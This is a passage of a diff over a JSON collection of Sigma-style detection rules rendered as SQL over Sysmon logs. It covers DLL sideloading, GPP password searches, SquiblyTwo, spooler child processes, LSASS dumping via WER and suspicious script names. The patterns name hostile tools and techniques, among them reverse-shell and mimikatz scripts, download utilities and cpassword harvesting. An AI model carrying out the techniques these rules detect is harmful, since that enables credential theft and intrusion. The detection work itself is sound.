'%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sigverif.exe' ESCAPE '\\')" ], - "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" + "filename": "proc_creation_win_lolbin_sigverif.yml" }, { - "title": "Third Party Software DLL Sideloading", - "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "title": "Suspicious Workstation Locking via Rundll32", + "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" ], - "filename": "image_load_side_load_third_party.yml" + "filename": "proc_creation_win_rundll32_user32_dll.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Remote Access Tool - GoToAssist Execution", + "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential SquiblyTwo Technique Execution", + "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "status": "test", + "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", + "author": "Markus Neis, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "status": "test", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", + "id": "02b18447-ea83-4b1b-8805-714a8a34546a", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_lolbin_offlinescannershell.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "tags": [ + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "title": "Wusa Extracting Cab Files", + "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + }, + { + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, 